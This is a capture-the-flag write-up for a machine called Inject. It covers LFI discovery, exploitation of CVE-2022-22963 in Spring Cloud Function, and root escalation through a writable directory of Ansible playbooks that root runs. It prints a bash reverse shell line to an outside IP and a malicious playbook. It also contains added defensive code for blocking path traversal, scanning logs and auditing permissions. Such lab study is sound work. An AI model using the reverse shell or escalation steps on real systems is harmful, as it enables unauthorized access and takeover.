Inject
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
Nikto:
GoBuster Scan:
Homepage:
/upload
/register
/blogs
/release_notes
Uploaded jpg:
WFuzz LFI Scan:
CMD: wfuzz -c -t 50 --hc 404,500 --hh 0 -z file,/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt http://10.129.230.151:8080/show_image?img=FUZZ
Shows folder listing as well:
Reading /var/www/WebApp/pom.xml through the LFI shows that Spring Cloud Function is version 3.2.2.
3.2.2 is vulnerable.
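From the defensive side, the show_image?img= parameter above is a textbook path traversal: the handler joins user input onto an image directory without checking where the result lands. The following is an added example (not code from the writeup or from the target application) showing both halves of the fix: a hardened path lookup that rejects anything resolving outside the image directory, and a small log-review function that flags the same traversal attempts in web server access logs. It goes slightly beyond the writeup by also catching URL-encoded traversal. The base directory /var/www/WebApp/images, the combined-log-format regex and the sample log lines are all assumptions constructed for the example.

```python
import re
from pathlib import Path
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not taken from the target.
SAMPLE_LOG = [
    '10.10.14.21 - - [01/Jan/2024:10:00:00 +0000] "GET /show_image?img=logo.jpg HTTP/1.1" 200 5120',
    '10.10.14.21 - - [01/Jan/2024:10:00:01 +0000] "GET /show_image?img=../../../../etc/passwd HTTP/1.1" 200 1823',
    '10.10.14.21 - - [01/Jan/2024:10:00:02 +0000] "GET /show_image?img=..%2f..%2f..%2f..%2fvar/www/WebApp/pom.xml HTTP/1.1" 200 4410',
    '10.10.14.21 - - [01/Jan/2024:10:00:03 +0000] "GET /blogs HTTP/1.1" 200 2048',
]

# Pulls the method and request target out of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumed image directory for the application (hypothetical path).
IMAGE_DIR = "/var/www/WebApp/images"


def resolve_image(base_dir, requested):
    """Hardened lookup: return the resolved path of `requested` if it stays inside
    base_dir, otherwise None. Decoding happens before normalisation so that
    percent-encoded (and double-encoded) '../' sequences are caught as well."""
    base = Path(base_dir).resolve()
    name = unquote(unquote(requested))
    candidate = (base / name).resolve()  # absolute input replaces base, then fails the parent check
    if candidate == base or base not in candidate.parents:
        return None
    return candidate


def flag_lfi_requests(lines, base_dir=IMAGE_DIR):
    """Review access-log lines and return (line_no, decoded_img) for every
    /show_image request whose img parameter would escape base_dir."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if parts.path != "/show_image":
            continue
        for img in parse_qs(parts.query).get("img", []):
            if resolve_image(base_dir, img) is None:
                hits.append((line_no, unquote(img)))
    return hits


if __name__ == "__main__":
    for line_no, img in flag_lfi_requests(SAMPLE_LOG):
        print(f"line {line_no}: traversal attempt img={img}")
```

The key design point is that the check is done on the fully resolved path, not on the raw string: blocklisting "../" is easily bypassed by encoding, while "does the resolved path still have the image directory as an ancestor" is not. Denying absolute paths and empty names falls out of the same comparison.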
CVE: CVE-2022-22963
Info: https://spring.io/security/cve-2022-22963
PoC: https://github.com/dinosn/CVE-2022-22963
Used the PoC to execute a ping as a test:
Initial Foothold
Uploaded revshell.sh to /dev/shm, chmod'd it +x and executed it. Received a reverse shell (the script contains a bash reverse shell one-liner).
Created an SSH key pair, uploaded the public key, and SSHed in as frank.
Found phil's username and password in /home/frank/.m2/settings.xml
User.txt Proof Screenshot
Privilege Escalation
/opt/automation/tasks has an Ansible playbook in it
Looks like root is running the automation:
https://gtfobins.github.io/gtfobins/ansible-playbook/
Created a new playbook that runs the revshell script from before:
playbook_2.yml
- hosts: localhost
  tasks: [shell: /dev/shm/revshell.sh]
Contents of revshell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.21/8888 0>&1
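The root cause of this privilege escalation is that a directory whose playbooks root executes can be written to by a lower-privileged user. The check a sysadmin would want is a quick audit of such task directories for files (or the directory itself) that are group/world-writable or not owned by the expected account. The following is an added example, not part of the writeup or of any Ansible tooling; find_risky_task_files and the temporary fixture it is demonstrated on are constructed for this page, and the fixture deliberately mirrors the misconfiguration described above.

```python
import os
import stat
import tempfile
from pathlib import Path

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH  # group- or world-writable


def find_risky_task_files(task_dir, expected_uid=0):
    """Audit a directory of root-executed automation (e.g. Ansible playbooks).
    Returns a list of (name, reason) findings, where name is "." for the
    directory itself. A writable directory is flagged because it lets any user
    drop a new playbook beside the legitimate ones, even if those are read-only."""
    task_dir = Path(task_dir)
    findings = []

    def check(path, label):
        st = path.stat()
        if st.st_mode & WRITE_BITS:
            findings.append((label, "writable by group/other"))
        if st.st_uid != expected_uid:
            findings.append((label, f"owned by uid {st.st_uid}, expected {expected_uid}"))

    check(task_dir, ".")
    for entry in sorted(task_dir.iterdir()):
        check(entry, entry.name)
    return findings


def demo():
    """Constructed fixture: a world-writable tasks directory holding one
    read-only playbook and one group/world-writable playbook. The directory
    is created in a temp location, so nothing on the real system is touched."""
    with tempfile.TemporaryDirectory() as tmp:
        tasks = Path(tmp) / "tasks"
        tasks.mkdir()
        (tasks / "playbook_1.yml").write_text("- hosts: localhost\n  tasks: []\n")
        (tasks / "playbook_2.yml").write_text("- hosts: localhost\n  tasks: []\n")
        os.chmod(tasks / "playbook_1.yml", 0o644)
        os.chmod(tasks / "playbook_2.yml", 0o666)
        os.chmod(tasks, 0o777)
        # The fixture is owned by whoever runs the demo, so use that uid as "expected"
        # to exercise only the permission-bit checks here.
        return find_risky_task_files(tasks, expected_uid=os.getuid())


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

In production the call would be find_risky_task_files("/opt/automation/tasks") with the default expected_uid of 0, since whatever root runs on a schedule should be owned by root and writable only by root; the same logic applies to cron scripts and any other root-driven automation directory.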
Root Screenshot Here: